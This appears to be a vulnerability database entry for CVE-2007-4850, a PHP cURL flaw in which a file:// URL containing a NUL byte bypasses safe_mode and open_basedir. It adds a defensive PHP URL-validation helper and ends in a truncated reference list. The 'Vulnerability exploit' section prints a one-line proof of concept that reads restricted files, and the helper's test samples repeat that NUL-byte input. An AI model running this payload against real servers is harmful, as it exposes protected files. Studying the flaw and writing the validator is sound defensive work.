PHP cURL library 'curl/interface.c' security restriction bypass vulnerability

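Vulnerability ID: 1114394    Vulnerability type: Permissions, privileges and access control
Published: 2008-01-23    Updated: 2009-03-06
CVE ID: CVE-2007-4850    CNNVD-ID: CNNVD-200801-377
Platform: PHP    CVSS score: 5.0
|Vulnerability source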
https://www.exploit-db.com/exploits/31053
https://www.securityfocus.com/bid/27413
https://cxsecurity.com/issue/WLB-2008010060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-377
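|Vulnerability details
curl/interface.c in the cURL library (also known as libcurl) in PHP 5.2.4 and 5.2.5 contains a security restriction bypass vulnerability. A remote attacker can bypass the safe_mode and open_basedir restrictions and read arbitrary files via a file:// request that contains a \x00 sequence. This is a different vulnerability from CVE-2006-2563.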
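
A defensive pre-flight check for the flaw described above, as an added example that is not part of the original advisory or of PHP's own code: it rejects URLs carrying NUL or other control bytes and restricts cURL to HTTP(S), so a file:// request never reaches libcurl. The helper names `url_rejection_reason` and `safe_curl_init` are hypothetical, and the code assumes PHP 7.1+ with a cURL build that supports CURLOPT_PROTOCOLS.

```php
<?php
// Added example; url_rejection_reason() and safe_curl_init() are hypothetical helpers.

// Returns null when the URL is acceptable, otherwise the reason it was refused.
function url_rejection_reason(string $url): ?string
{
    // A raw NUL (or any control byte) can make a path check and the
    // code that opens the file see two different strings.
    if (preg_match('/[\x00-\x1f\x7f]/', $url)) {
        return 'control byte in URL';
    }
    // A percent-encoded NUL may be decoded into a raw NUL further down the stack.
    if (stripos($url, '%00') !== false) {
        return 'percent-encoded NUL in URL';
    }
    // Allowlist the schemes the application needs; file:// is never one of them here.
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return 'scheme not allowed';
    }
    return null;
}

function safe_curl_init(string $url)
{
    $reason = url_rejection_reason($url);
    if ($reason !== null) {
        throw new InvalidArgumentException("refusing URL: $reason");
    }
    $ch = curl_init($url);
    // Second layer: libcurl itself refuses other schemes, including after redirects.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    return $ch;
}

// Constructed sample inputs; the first has the shape of the request in this advisory.
$samples = [
    "file://safe_mode_bypass\x00" . __FILE__,
    'file:///tmp/report.txt',
    'http://example.com/a%00b',
    'https://example.com/feed.xml',
];
foreach ($samples as $u) {
    $reason = url_rejection_reason($u);
    printf("%-8s %s%s\n", $reason === null ? 'ALLOW' : 'REJECT',
        addcslashes($u, "\0..\37"), $reason === null ? '' : "  ($reason)");
}
```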
|Vulnerability exploit
source: http://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4. 

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
|Affected products
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
|References

Source: XF
Name: php-curlinit-security-bypass(39852)
Link: http://xforce.iss.net/xforce/xfdb/39852
Source: XF
Name: php-safemode-directive-security-bypass(42134)
Link: http://xforce.iss.net/xforce/xfdb/42134
Source: UBUNTU
Name: USN-628-1
Link: http://www.ubuntu.com/usn/usn-628-1
Source: BID
Name: 31681
Link: http://www.securityfocus.com/bid/31681
Source: BID
Name: 27413
Link: http://www.securityfocus.com/bid/27413
Source: BUGTRAQ
Name: 20080527 rPSA-2008-0178-1 php php-mysql php-pgsql
Link: http://www.securityfocus.com/archive/1/archive/1/492671/100/0/threaded
Source: BUGTRAQ
Name: 20080122 PHP 5.2.5 cURL safe_mode bypass
Link: http://www.securityfocus.com/archive/1/archive/1/486856/100/0/threaded
Source: MANDRIVA
Name: MDVSA-2009:023
Link: http://www.mandriva.com/security/advisories?name=MDVSA-2009:023
Source: MANDRIVA
Name: MDVSA-2009:022
Link: http://www.mandriva.com/security/advisories?name=MDVSA-2009:022
Source: VUPEN
Name: ADV-2008-2780
Link: http://www.frsirt.com/english/advisories/2008/2780
Source: VUPEN
Name: ADV-2008-2268
Link: http://www.frsirt.com/english/advisories/2008/2268
Source: wiki.rpath.com
Link: ht